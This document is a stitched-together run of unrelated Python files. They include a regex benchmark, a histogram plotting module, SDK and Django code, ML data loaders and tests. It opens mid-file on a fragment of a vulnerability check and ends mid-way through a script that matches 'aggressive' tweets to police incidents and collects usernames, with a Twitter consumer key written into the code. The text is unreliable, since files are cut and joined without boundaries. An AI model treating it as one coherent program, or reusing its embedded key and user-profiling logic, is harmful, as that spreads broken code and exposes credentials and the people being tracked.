resp.headers.get('Date', None): date = resp.headers['Date'] if '11 Nov 1999 11' in date: self.output('Target is vulnable') def main(self, *args, **kwargs): self.check() """ This module compares Ruler performance to that of the Python standard re library. The idea is to match the same few lines of text and compare how long it takes using re and ruler. Since the measurements always have non-deterministic, but always positive, measurement errors, we will make many short measurements and compare the fastest ones encountered. """ import re import timeit import ruler as r TIMEIT_ITERATIONS = 10000 ATTEMPTS_COUNT = 50 # These are the strings that will be matched ann_likes_juice = 'Ann likes to drink juice' peter_likes_tea = 'Peter likes to drink tea' john_likes_tea_with_milk = 'John likes to drink tea with milk' class ReTimer(object): """ Match and time the strings using the Python standard re library """ def __init__(self): self.grammar = re.compile(r""" (?P John|Peter|Ann ) [ ]likes[ ]to[ ]drink [ ](?P (?P juice ) | (?P tea ([ ]with[ ](?P milk ))?) 
)""", re.VERBOSE) self.timer = timeit.Timer('self.match()', globals=locals()) def match(self): g = self.grammar.match(ann_likes_juice).groupdict() assert g['who'] == 'Ann' assert g['what'] == 'juice' assert g['juice'] is not None assert g['tea'] is None assert g['milk'] is None g = self.grammar.match(peter_likes_tea).groupdict() assert g['who'] == 'Peter' assert g['what'] == 'tea' assert g['juice'] is None assert g['tea'] is not None assert g['milk'] is None g = self.grammar.match(john_likes_tea_with_milk).groupdict() assert g['who'] == 'John' assert g['what'] == 'tea with milk' assert g['juice'] is None assert g['tea'] is not None assert g['milk'] is not None def time(self): return self.timer.timeit(TIMEIT_ITERATIONS) class RulerTimer(object): """ Match and time the strings using Ruler library """ def __init__(self): class MorningDrink(r.Grammar): who = r.OneOf('John', 'Peter', 'Ann') juice = r.Rule('juice') milk = r.Rule('milk') tea = r.Rule('tea', r.Optional(' with ', milk)) what = r.OneOf(juice, tea) grammar = r.Rule(who, ' likes to drink ', what) self.grammar = MorningDrink.create() self.timer = timeit.Timer('self.match()', globals=locals()) def match(self): g = self.grammar assert g.match(ann_likes_juice) assert g.who.matched == 'Ann' assert g.what.matched == 'juice' assert g.what.juice.matched assert g.what.tea.matched is None assert g.match(peter_likes_tea) assert g.who.matched == 'Peter' assert g.what.matched == 'tea' assert g.what.juice.matched is None assert g.what.tea.matched assert g.match(john_likes_tea_with_milk) assert g.who.matched == 'John' assert g.what.matched == 'tea with milk' assert g.what.juice.matched is None assert g.what.tea assert g.what.tea.milk def time(self): return self.timer.timeit(TIMEIT_ITERATIONS) def main(): re_timer = ReTimer() ruler_timer = RulerTimer() re_measurements = [] ruler_measurements = [] for attempt in range(ATTEMPTS_COUNT): print('Attempt {} out of {}...'.format(attempt+1, ATTEMPTS_COUNT)) re_measurements.append(re_timer.time()) ruler_measurements.append(ruler_timer.time()) print(' re: {:.3f} {}'.format(re_measurements[-1], 'New record!' if re_measurements[-1] == min(re_measurements) else '')) print(' ruler: {:.3f} {}'.format(ruler_measurements[-1], 'New record!' 
if ruler_measurements[-1] == min(ruler_measurements) else '')) print('Performance ratio: {}'.format(int(min(ruler_measurements) / min(re_measurements)))) if __name__ == '__main__': main() #!/usr/bin/env python # encoding: utf-8 # File : module.py # Author : # Contact : # Date : 2019 Mar 06 # # Description : import numpy as np ## rootpy import rootpy from rootpy.plotting import Hist, Hist2D from collections import OrderedDict import uproot import awkward class Module(): def __init__(self, folder): self.folderName = folder self.cuts = set() self.hist = OrderedDict() self.color=None self.linecolor=None self.markercolor=None self.fillcolor=None self.linewidth=None self.linestyle=None self.markersize=None self.markerstyle=None self.fillstyle=None ## Process info self.isData = False self.isFastsim = False self.isSUSY = False self.Lumi = 0 self.CrossSection = 0 self.ExpectedNEvent = 0 self.era = None self.process = None self.period = None self.process_full = None def ObtainInfo(self, isData, isFastsim, isSUSY, Lumi, CrossSection, era, process, period): self.isData = isData self.isFastsim = isFastsim self.isSUSY = isSUSY self.Lumi = Lumi self.CrossSection = CrossSection self.era = era self.process = process self.period = period def get_hist(self, name): return self.hist[ self.folderName+"_"+name] def set_hist(self, name, th1): self.hist[ self.folderName+"_"+name] = th1 def setHistStyle(self, name, color_=None, linecolor_=None, markercolor_=None, fillcolor_=None, linewidth_=None, linestyle_=None, markersize_=None, markerstyle_=None, fillstyle_=None): if name not in self.hist: print("Histogram is not defined yet! Not setting style for %s, exitting!" % name_) ## Setup the plotting, since TH1 inherited from TAttLine, TAttFill, TAttMarkerS color = color_ if color_ is not None else self.color if self.color is not None else None if color is not None: self.hist[name].SetLineColor(color) self.hist[name].SetMarkerColor(color) self.hist[name].SetFillColor(color) ## Set line linecolor = linecolor_ if linecolor_ is not None else self.linecolor if self.linecolor is not None else None if linecolor is not None: self.hist[name].SetLineColor(linecolor) linewidth = linewidth_ if linewidth_ is not None else self.linewidth if self.linewidth is not None else None if linewidth is not None: self.hist[name].SetLineWidth(linewidth) linestyle = linestyle_ if linestyle_ is not None else self.linestyle if self.linestyle is not None else None if linestyle is not None: self.hist[name].SetLineStyle(linestyle) ## Set Marker markercolor = markercolor_ if markercolor_ is not None else self.markercolor if self.markercolor is not None else None if markercolor is not None: self.hist[name].SetMarkerColor(markercolor) markersize = markersize_ if markersize_ is not None else self.markersize if self.markersize is not None else None if markersize is not None: self.hist[name].SetMarkerSize(markersize) markerstyle = markerstyle_ if markerstyle_ is not None else self.markerstyle if self.markerstyle is not None else None if markerstyle is not None: self.hist[name].SetMarkerStyle(markerstyle) ## Set fill fillcolor = fillcolor_ if fillcolor_ is not None else self.fillcolor if self.fillcolor is not None else None if fillcolor is not None: self.hist[name].SetFillColor(fillcolor) fillstyle = fillstyle_ if fillstyle_ is not None else self.fillstyle if self.fillstyle is not None else None if fillstyle is not None: self.hist[name].SetFillStyle(fillstyle) def th2(self, name_, xvalues, yvalues, bins, title="", xlabel="", ylabel="", cut = None, 
color=None, linecolor=None, markercolor=None, fillcolor=None, linewidth=None, linestyle=None, markersize=None, markerstyle=None, fillstyle=None): ''' template type of function for TH2D, including all the overloaded construction function ''' ## Create an unique name to prevent memory leak in ROOT if cut is not None: name = self.folderName+"_"+name_+"___"+cut if cut not in self.cuts: self.cuts.add(cut) else: name = self.folderName+"_"+name_ if name not in self.hist.keys(): newtitle = title+";"+xlabel+";"+ylabel self.hist[name] = Hist2D(*bins, name =name, title =newtitle) self.setHistStyle(name, color, linecolor, markercolor, fillcolor, linewidth, linestyle, markersize, markerstyle, fillstyle) #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Fill Th2 ~~~~~ x = None y = None if xvalues is None: pass elif isinstance(xvalues, awkward.JaggedArray): x = xvalues.flatten() elif isinstance(xvalues, np.ndarray): x = xvalues else: x = [xvalues] if yvalues is None: pass elif isinstance(yvalues, awkward.JaggedArray): y = yvalues.flatten() elif isinstance(yvalues, np.ndarray): y = yvalues else: y = [yvalues] self.hist[name].fill_array( np.vstack((x, y)).T) return self.hist[name] def th1(self, name_, values, xbins=None, xlow=0, xhigh=0, cut=None, weight=None, title="", xlabel="", ylabel="", \ trigRate = False, color=None, linecolor=None, markercolor=None, fillcolor=None, linewidth=None, linestyle=None, markersize=None, markerstyle=None, fillstyle=None): ## Create an unique name to prevent memory leak in ROOT if cut is not None: name = self.folderName+"_"+name_+"___"+cut if cut not in self.cuts: self.cuts.add(cut) else: name = self.folderName+"_"+name_ if name not in self.hist: newtitle = title+";"+xlabel+";"+ylabel if isinstance(xbins, (list, np.ndarray)): self.hist[name] = Hist(xbins, name =name, title =newtitle) else: self.hist[name] = Hist(xbins, xlow, xhigh, name =name, title =newtitle) self.setHistStyle(name, color, linecolor, markercolor, fillcolor, linewidth, linestyle, markersize, markerstyle, fillstyle) #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Filling ~~~~~ if values is None: return self.hist[name] localvalue = None localweight = weight if isinstance(values, awkward.JaggedArray): if weight is not None and values.flatten().size > 0: print(weight, values, values.content, values.flatten().size) localweight = weight + values - values localvalue = values.flatten() localweight = localweight.flatten() if weight is not None else None elif not isinstance(values, (list, np.ndarray)): localvalue = [values] localweight = [localweight] if weight is not None else None else: localvalue = values if trigRate: bins = np.fromiter(self.hist[name].xedges(), float) upperidx = np.searchsorted(bins, localvalue) self.hist[name].fill_array(np.concatenate([bins[:x] for x in upperidx])) else: self.hist[name].fill_array(localvalue, weights=localweight) return self.hist[name] def analyze(): return True def endJob(self, totalevents): return True def SaveHist(self, outfile): outfile.cd() outfile.mkdir(self.folderName) histmap = {"Default" : {}} for c in self.cuts: outfile.mkdir(self.folderName + "_"+c) histmap[c] = {} for k, v in self.hist.items(): cutname = k.split("___", 1)[-1] orgname = k.split("_", 1)[1].split("___", 1)[0] if cutname in histmap.keys(): histmap[cutname][k] = orgname else: histmap["Default"][k] = orgname for k, v in histmap.items(): if k is "Default": outfile.cd(self.folderName) else: outfile.cd(self.folderName + "_"+k) for j in v.keys(): h = self.hist[j] h.SetName(v[j]) 
h.Write() tests/unit/test_exceptions.py #!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import absolute_import, unicode_literals import pickle import unittest from mock import MagicMock as Mock import pyrax.utils as utils import pyrax.exceptions as exc from pyrax import fakes fake_url = "http://example.com" class ExceptionsTest(unittest.TestCase): def __init__(self, *args, **kwargs): super(ExceptionsTest, self).__init__(*args, **kwargs) def setUp(self): pass def tearDown(self): pass def test_from_response_no_body(self): fake_resp = fakes.FakeResponse() fake_resp.status_code = 666 ret = exc.from_response(fake_resp, None) self.assertTrue(isinstance(ret, exc.ClientException)) self.assertEqual(ret.code, fake_resp.status_code) def test_from_response_with_body(self): fake_resp = fakes.FakeResponse() fake_resp.status_code = 666 fake_body = {"error": { "message": "fake_message", "details": "fake_details"}} ret = exc.from_response(fake_resp, fake_body) self.assertTrue(isinstance(ret, exc.ClientException)) self.assertEqual(ret.code, fake_resp.status_code) self.assertEqual(ret.message, "fake_message") self.assertEqual(ret.details, "fake_details") self.assertTrue("HTTP 666" in str(ret)) def test_pickle(self): error = exc.NotFound(42, 'message', 'details', 0xDEADBEEF) pickled_error = pickle.dumps(error, -1) unpickled_error = pickle.loads(pickled_error) self.assertIsInstance(unpickled_error, exc.NotFound) self.assertEqual(unpickled_error.code, 42) self.assertEqual(unpickled_error.message, 'message') self.assertEqual(unpickled_error.details, 'details') self.assertEqual(unpickled_error.request_id, 0xDEADBEEF) if __name__ == "__main__": unittest.main() 1-10 import os import torch import util.data_transformer as transforms from data.test_dataset import ImageFolder import util.extract_feature as ext_feat from eval.eval_1v1 import * def cfp_test_gpu(cfp_path, model, method='FP'): batch_size = 200 workers = 8 method_set = 'CFP' cfp_data_path = os.path.join(cfp_path, 'Align_180_220/') meta_path = os.path.join(cfp_path, 'myMeta/%s_meta.txt' % method) model.eval() with torch.no_grad(): # test dataloader transform = transforms.Compose([ transforms.CenterCropWithOffset(150, 150, 0, 20, 0, 0, ignore_fault=True), transforms.Scale((112, 112)), transforms.ToTensor(), transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5]) ]) test_dataset = ImageFolder( root=cfp_data_path, proto=os.path.join(cfp_path, 'myMeta/Pair_list_A.txt'), transform=transform, method=method_set ) test_dataloader = torch.utils.data.DataLoader( test_dataset, batch_size=batch_size, shuffle=False, num_workers=workers, pin_memory=True) feature = ext_feat.extract_feature(test_dataloader, model) # feature extraction feature_np = feature.numpy().astype(np.float32) best_acc, best_thresh = base_1v1(feature_np, meta_path, method_set, similarity=cosine_similarity) print('CFP-%s acc is %f at threshold %f' % (method, best_acc, best_thresh)) return best_acc, best_thresh # Generated by Django 2.0 on 2018-09-18 16:55 from django.db import migrations import django.db.models.manager class Migration(migrations.Migration): dependencies = [ ('links', '0014_classwebsite'), ] operations = [ migrations.AlterModelOptions( name='actionbutton', options={'default_manager_name': 'base_manager', 'get_latest_by': 'update_date', 'ordering': ['inline_order'], 'permissions': (('trash_actionbutton', 'Can soft delete action button'), ('restore_resourcelink', 'Can restore action button')), 'verbose_name': 'Action Button', 'verbose_name_plural': 'Action Buttons'}, 
), migrations.AlterModelOptions( name='classwebsite', options={'default_manager_name': 'base_manager', 'get_latest_by': 'update_date', 'ordering': ['inline_order'], 'permissions': (('trash_classwebsite', 'Can soft delete class website'), ('restore_resourcelink', 'Can restore class website')), 'verbose_name': 'Class Website', 'verbose_name_plural': 'Class Websites'}, ), migrations.AlterModelOptions( name='resourcelink', options={'default_manager_name': 'base_manager', 'get_latest_by': 'update_date', 'ordering': ['inline_order'], 'permissions': (('trash_resourcelink', 'Can soft delete resource link'), ('restore_resourcelink', 'Can restore resource link')), 'verbose_name': 'Resource Link', 'verbose_name_plural': 'Resource Links'}, ), migrations.AlterModelManagers( name='actionbutton', managers=[ ('base_manager', django.db.models.manager.Manager()), ], ), migrations.AlterModelManagers( name='classwebsite', managers=[ ('base_manager', django.db.models.manager.Manager()), ], ), migrations.AlterModelManagers( name='resourcelink', managers=[ ('base_manager', django.db.models.manager.Manager()), ], ), ] lib/bindings/samples/server/API/handlers.py #!/usr/bin/env python import inspect import json import logging import schema import jsonschema from concurrent.futures import Future import tornado import tornado.gen import tornado.web from tornado.web import RequestHandler, StaticFileHandler import errors class BaseHandler(RequestHandler): def data_received(self, chunk): raise NotImplementedError() class IndexPageHandler(BaseHandler): def get(self): self.render(MAIN_INDEX, status="Ready", info="Retrieving data ...") class StaticTextFileHandler(StaticFileHandler): def set_default_headers(self): self.set_header('Content-Type', 'text/plain') class DevStaticFileHandler(StaticFileHandler): def set_extra_headers(self, path): # Disable cache self.set_header( 'Cache-Control', 'no-store, no-cache, must-revalidate, max-age=0') logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class CommandHandler(tornado.web.RequestHandler): """REST Command Handler Routes json command in the form {'name' : 'apiHandler.function', 'parameters' : {}} to the right apiHandler instance function (see https://developers.google.com/streetview/open-spherical-camera/ for an overview of the protocol) This handler supports synchronous and asyncronous calls. Asynchronous API methods must be decorated with @run_on_executor and the enclosing class must provide an 'executor' ThreadPoolExecutor class instance. 
Example::: class MyAPIHandler(APIHandler): executor = ThreadPoolExecutor(1) @run_on_executor def asynchronousAPI (self, parameters) : return def synchronousAPI (self, parameters) : return """ def initialize(self, apiHandlers, extra): self.apiHandlers = apiHandlers self.extra = extra self.verbose = extra["verbose"] def set_default_headers(self): self.set_header("Access-Control-Allow-Origin", "*") self.set_header("Access-Control-Allow-Headers", "x-requested-with") self.set_header('Access-Control-Allow-Methods', 'POST') @tornado.gen.coroutine def post(self): try: data = json.loads(self.request.body) except ValueError: raise tornado.web.HTTPError(400, "Ill-formed message command") # Split command name command_name = data.get("name") if command_name is None: raise tornado.web.HTTPError(400, "No command name") if command_name.count(".") != 1: raise tornado.web.HTTPError(400, "Invalid command name") (class_name, function_name) = command_name.split(".") # Create a handler instance class_instance = self.apiHandlers.get(class_name) if class_instance is None: raise tornado.web.HTTPError(400, "Unknown handler " + class_name) instance = class_instance(self.extra) # Validate parameters validate = data.get("validate", True) log = data.get("log", True) try: parameters = data.get("parameters") if self.verbose and log: logger.info( "> " + class_name + "." + function_name + "(" + \ json.dumps(parameters) + ")") if validate: schema.api.validate_parameters(command_name, parameters) except jsonschema.ValidationError as ve: e = errors.InvalidParameter(str(ve)).payload m = {'error': e} logger.error(command_name + ", invalid parameter:\n" + str(ve)) else: # Call instance method if not hasattr(instance, function_name): raise tornado.web.HTTPError( 400, "Unknown function " + command_name) # call method function = getattr(instance, function_name) future = function(parameters) try: if isinstance(future, Future) or isinstance( future, tornado.concurrent.Future): result = yield future else: f = Future() f.set_result(future) result = yield f except errors.VSError as e: m = {'error': e.payload} else: # Validate result try: if validate: schema.api.validate_result(command_name, result) except jsonschema.ValidationError as ve: e = errors.InvalidReturnValue(str(ve)).payload m = {'error': e} logger.error(command_name + ", invalid return value:\n" + str(ve)) else: m = {'results': result} if self.verbose and log: logger.info("< " + json.dumps(m)) self.write(m) self.finish() class APIHandler(object): """Base class for APIHandlers """ def __init__(self, extra): pass def get_methods(self): """Get the list of exposed methods for the API Returns: A list of methods available. """ members = [] for member in inspect.getmembers(self, predicate=inspect.ismethod): if member[0] not in ["__init__", "ok", "error"]: members.append(member[0]) return members bundle_cache/app_store/tk-multi-demo/v1.0.2/python/tk_multi_demo/demos/custom_field_widget/favorite_widget.py # Copyright (c) 2016 Shotgun Software Inc. # # CONFIDENTIAL AND PROPRIETARY # # This work is provided "AS IS" and subject to the Shotgun Pipeline Toolkit # Source Code License included in this distribution package. See LICENSE. # By accessing, using, copying or modifying this work you indicate your # agreement to the Shotgun Pipeline Toolkit Source Code License. All rights # not expressly granted therein are reserved by Shotgun Software Inc. 
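# Client-side usage sketch for the CommandHandler defined in handlers.py above:
# commands are POSTed as JSON of the form {"name": "apiHandler.function",
# "parameters": {...}} and the reply carries either {"results": ...} or
# {"error": ...}. The command name "camera.getStatus", the URL, and the port
# below are hypothetical illustrations, not part of this project.
import json
import urllib.request


def send_command(name, parameters, url="http://localhost:8000/command"):
    body = json.dumps({"name": name, "parameters": parameters}).encode("utf-8")
    req = urllib.request.Request(
        url, data=body,
        headers={"Content-Type": "application/json"}, method="POST")
    with urllib.request.urlopen(req) as resp:
        reply = json.loads(resp.read().decode("utf-8"))
    if "error" in reply:
        raise RuntimeError(reply["error"])
    return reply["results"]


# status = send_command("camera.getStatus", {})  # hypothetical handler/method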
import sgtk # import the shotgun_fields module from the qtwidgets framework shotgun_fields = sgtk.platform.import_framework( "tk-framework-qtwidgets", "shotgun_fields") # the default shotgun fields checkbox widget DefaultCheckBoxWidget = shotgun_fields.checkbox_widget.CheckBoxWidget class MyProjectFavoritesWidget(DefaultCheckBoxWidget): """ A custom display widget for the Project entity's "favorite" field. Shotgun also displays this field in a custom way. """ # defining the meta class will register this class for use by the # field manager widget factory. the simple act of importing this class # will be enough to register it and apply it to the project favorite field. __metaclass__ = shotgun_fields.ShotgunFieldMeta # make this class usable as both an editor and display widget for fields # of type "checkbox" _DISPLAY_TYPE = "checkbox" _EDITOR_TYPE = "checkbox" # define which specific entities & fields this widget should be used for _ENTITY_FIELDS = [("Project", "current_user_favorite")] # NOTE: Here we are subclassing the default shotgun fields check box # widget and applying a different style to it (see the demo's style.qss # file). soma2000-lang/colourcolour/characterisation/datasets/lenses/sds.py """ Spectral Distributions of Lenses ================================ Defines the spectral distributions of lenses. Each lens data is in the form of :class:`dict` class instance of :class:`colour.SpectralDistribution` classes as follows:: {'name': SpectralDistribution, ..., 'name': SpectralDistribution} The following *lenses* are available: - ISO Standard Lens References ---------- - :cite:`InternationalOrganizationforStandardization2002` : International Organization for Standardization. (2002). INTERNATIONAL STANDARD ISO 7589-2002 - Photography - Illuminants for sensitometry - Specifications for daylight, incandescent tungsten and printer. """ from __future__ import annotations from functools import partial from colour.colorimetry import SpectralDistribution from colour.hints import Dict from colour.utilities import LazyCaseInsensitiveMapping __author__ = "Colour Developers" __copyright__ = "Copyright (C) 2013-2022 - Colour Developers" __license__ = "New BSD License - https://opensource.org/licenses/BSD-3-Clause" __maintainer__ = "Colour Developers" __email__ = "" __status__ = "Production" __all__ = [ "DATA_LENSES_ISO", "SDS_LENSES_ISO", "SDS_LENSES", ] DATA_LENSES_ISO: Dict = { "ISO Standard Lens": { 350: 0.00, 360: 0.07, 370: 0.23, 380: 0.42, 390: 0.60, 400: 0.74, 410: 0.83, 420: 0.88, 430: 0.91, 440: 0.94, 450: 0.95, 460: 0.97, 470: 0.98, 480: 0.98, 490: 0.99, 500: 0.99, 510: 1.00, 520: 1.00, 530: 1.00, 540: 1.00, 550: 1.00, 560: 1.00, 570: 1.00, 580: 1.00, 590: 0.99, 600: 0.99, 610: 0.99, 620: 0.98, 630: 0.98, 640: 0.97, 650: 0.97, 660: 0.96, 670: 0.95, 680: 0.94, 690: 0.94, } } SDS_LENSES_ISO: LazyCaseInsensitiveMapping = LazyCaseInsensitiveMapping( { "ISO Standard Lens": partial( SpectralDistribution, DATA_LENSES_ISO["ISO Standard Lens"], name="ISO Standard Lens", ), } ) SDS_LENSES_ISO.__doc__ = """ Spectral distributions of *ISO* lenses. References ---------- :cite:`InternationalOrganizationforStandardization2002` """ SDS_LENSES: LazyCaseInsensitiveMapping = LazyCaseInsensitiveMapping( SDS_LENSES_ISO ) SDS_LENSES.__doc__ = """ Spectral distributions of lenses. 
References ---------- :cite:`InternationalOrganizationforStandardization2002` """ import logging import logging.config logging.config.dictConfig({ 'version': 1, 'handlers': { 'console': { 'class': 'logging.StreamHandler' } }, 'loggers': { 'default': { 'level': 'DEBUG', 'handlers': ['console'] } } }) logger = logging.getLogger('default') from logger_loco import loco external_var = 12 MYCONST = 10 @loco(logger) def myfunc(a, b, x=MYCONST): # Regular comment #@ Debug #- Info #! Warning #X Error #@ Inject {a} + {b} = {a + b} #@ External var: {external_var} #@ Comment with manny backslashes \\\\\\ and quotes ''' #--> #@ Indented #<-- #@ Not indented return a + b @loco(logger, indent_size=4) def fun2(): #--> #@ Indented with 4 spaces #--> #@ Indented deeper #<-- #<-- #@ Regular ... @loco(logger) def func3(): # some # ... #... #... try: raise Exception('Some error') except Exception as e: print(e) myfunc(1, 2) fun2() func3() class OtherClass(object): pass @loco(logger) class MyCalss(OtherClass): def __init__(self, *args, **kw): super().__init__(*args, **kw) def method_a(self, a, b): #- Works inside class method a + b = {a + b} ... MyCalss().method_a(1, 2) 1-10 import cv2 import torch import numpy as np from PIL import Image from torchvision import transforms from .commons import sample_frames_metafunc, sample_clips_metafunc, preprocess_frame_metafunc, preprocess_clip_metafunc class VideoDataset(object): def __init__(self, stride, mean, std, resize_to, crop_to, type='frame'): self.sample_func = sample_frames_metafunc(stride) self.preprocess_func = preprocess_frame_metafunc(mean, std, resize_to, crop_to) """ self.preprocess_func2 = transforms.Compose([ transforms.Resize(resize_to), #transforms.CenterCrop(crop_to), transforms.ToTensor(), transforms.Normalize(mean, std), ]) """ if type == 'clip': self.sample_func = sample_clips_metafunc(stride) self.preprocess_func = preprocess_clip_metafunc(mean, std, resize_to, crop_to) def __call__(self, video_fpath): X = self.sample_func(video_fpath) if X.shape[0] == 0: return None self.samples = X return self def __getitem__(self, idx): sample = self.samples[idx] #sample = Image.fromarray(sample, mode='RGB') sample = self.preprocess_func(sample) if len(sample.shape) == 3: # HxWxC --> CxHxW sample = sample.transpose((2, 0, 1)) elif len(sample.shape) == 4: # NxHxWxC --> CxNxHxW sample = sample.transpose((3, 0, 1, 2)) else: raise NotImplementedError("Unknown sample of shape {}".format(sample.shape)) return torch.from_numpy(sample).float() def __len__(self): return self.samples.shape[0] liumihust/aliyun-openapi-python-sdkaliyun-python-sdk-emr/aliyunsdkemr/request/v20160408/AddHpHostRequest.py # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # # http://www.apache.org/licenses/LICENSE-2.0 # # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. 
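# Usage sketch (hypothetical values) for the AddHpHostRequest class defined
# below. set_HpHosts flattens a list of host dicts into numbered query
# parameters such as 'HpHost.1.CpuCore', 'HpHost.1.HpHostDisk.1' and
# 'HpHost.2.HostName', which is the convention the setters implement:
#
#     request = AddHpHostRequest()
#     request.set_HpBizId('my-hp-biz-id')          # hypothetical id
#     request.set_HpHosts([{
#         'CpuCore': 8,
#         'MemSize': 32768,
#         'Role': 'CORE',
#         'HostName': 'emr-worker-1',
#         'InnerIp': '10.0.0.11',
#         'HpHostDisks': ['/mnt/disk1', '/mnt/disk2'],
#     }])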
from aliyunsdkcore.request import RpcRequest from aliyunsdkemr.endpoint import endpoint_data class AddHpHostRequest(RpcRequest): def __init__(self): RpcRequest.__init__(self, 'Emr', '2016-04-08', 'AddHpHost','emr') if hasattr(self, "endpoint_map"): setattr(self, "endpoint_map", endpoint_data.getEndpointMap()) if hasattr(self, "endpoint_regional"): setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional()) def get_ResourceOwnerId(self): return self.get_query_params().get('ResourceOwnerId') def set_ResourceOwnerId(self,ResourceOwnerId): self.add_query_param('ResourceOwnerId',ResourceOwnerId) def get_HpHosts(self): return self.get_query_params().get('HpHosts') def set_HpHosts(self,HpHosts): for i in range(len(HpHosts)): if HpHosts[i].get('CpuCore') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.CpuCore' , HpHosts[i].get('CpuCore')) if HpHosts[i].get('MemSize') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.MemSize' , HpHosts[i].get('MemSize')) if HpHosts[i].get('RackInfo') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.RackInfo' , HpHosts[i].get('RackInfo')) if HpHosts[i].get('Role') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.Role' , HpHosts[i].get('Role')) if HpHosts[i].get('SerialNumber') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.SerialNumber' , HpHosts[i].get('SerialNumber')) if HpHosts[i].get('HostType') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.HostType' , HpHosts[i].get('HostType')) if HpHosts[i].get('SecurityGroupId') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.SecurityGroupId' , HpHosts[i].get('SecurityGroupId')) for j in range(len(HpHosts[i].get('HpHostDisks'))): if HpHosts[i].get('HpHostDisks')[j] is not None: self.add_query_param('HpHost.' + str(i + 1) + '.HpHostDisk.'+str(j + 1), HpHosts[i].get('HpHostDisks')[j]) if HpHosts[i].get('VswitchId') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.VswitchId' , HpHosts[i].get('VswitchId')) if HpHosts[i].get('ExternalKey') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.ExternalKey' , HpHosts[i].get('ExternalKey')) if HpHosts[i].get('HostName') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.HostName' , HpHosts[i].get('HostName')) if HpHosts[i].get('VpcId') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.VpcId' , HpHosts[i].get('VpcId')) if HpHosts[i].get('InnerIp') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.InnerIp' , HpHosts[i].get('InnerIp')) if HpHosts[i].get('ExternalIp') is not None: self.add_query_param('HpHost.' 
+ str(i + 1) + '.ExternalIp' , HpHosts[i].get('ExternalIp')) def get_HpBizId(self): return self.get_query_params().get('HpBizId') def set_HpBizId(self,HpBizId): self.add_query_param('HpBizId',HpBizId)from masonite.tests import TestCase from src.form_builder.Field import Field class TestBaseField(TestCase): def test_field_creation(self): field = Field.make("my_field") assert field._handle == "my_field" def test_placeholder(self): field = Field.make("my_field").placeholder("Enter a value") assert field.config.placeholder == "Enter a value" field = field.placeholder() assert field.config.placeholder == "" def test_label(self): field = Field.make("my_field").label("") assert field.config.label == "" field = field.label() assert field.config.label == "" import csv import re from datetime import * from time import * from threading import Timer import cpd_data from tweepy import OAuthHandler import tweepy import sys sys.path.append('code/tools') sys.path.append('code/classification') from features import get_feats from tools import write_out_data from cascade import cascade ckey = '6pobfVELAEwSIuDRJ6faOVnmN' consumer_secret = '' access_token_key = '' access_token_secret = '' def correlate(last_seen_id=None, num_days=5): #set up with today's date today = date.today() print today #TESTING x_days_ago = today-timedelta(days=num_days) #pull data from cpd from past month cpd_incidents = cpd_data.get_cpd_data(today) #TESTING for c in cpd_incidents: print c print #go through tweets from past week reader = csv.DictReader(open('/proj/nlp/users/terra/streaming_results/twitter_stream_result.csv', 'rb')) if last_seen_id: too_far_back=True else: too_far_back=False recent_tweets = [] usernames = [] most_recent_id = None for row in reader: if too_far_back: if row['ID'] == last_seen_id: too_far_back=False continue ts = strptime(row['DATE'], '%a %b %d %H:%M:%S +0000 %Y') dt = date.fromtimestamp(mktime(ts)) if dt > x_days_ago: break #else: most_recent_id = row['ID'] recent_tweets.append((row['ID'], row['CONTENT'], dt)) #get the usernames from tweet usernames.extend(get_usernames(row['CONTENT'])) #if labeled aggressive, put into aggressive list #aggressive_tweets = [(id, date)] aggressive_tweets = get_aggressive_tweets(recent_tweets) #TODO correlate events within 5 days after each aggress tweet with resp. tweet and output correlations to file with date correlated_data = {} for tweet in aggressive_tweets: tweet_id = tweet[0] tweet_date = tweet[1] end_date = tweet_date+timedelta(days=num_days) related_incidents = [] for c in cpd_incidents: ts = strptime(c['date'], '%Y-%m-%dT%H:%M:%S.000') event_date = date.fromtimestamp(mktime(ts)) if event_date >= tweet_date and event_date < end_date: related_incidents.append(c) correlated_data[tweet_id] = related_incidents #appends this week's data to file write_out_correlations(correlated_data) #writes username and userid to file if user description has gang hashtags write_out_usernames(usernames) print 'correlated!' return most_recent_id def get_usernames(tweet): twitter_username_re = re.compile(r'@([A-Za-z0-9_]+)') results = [] for m in twitter_username_re.finditer(tweet): results.append(m) return results #for now just writing out to (an additional) file. 
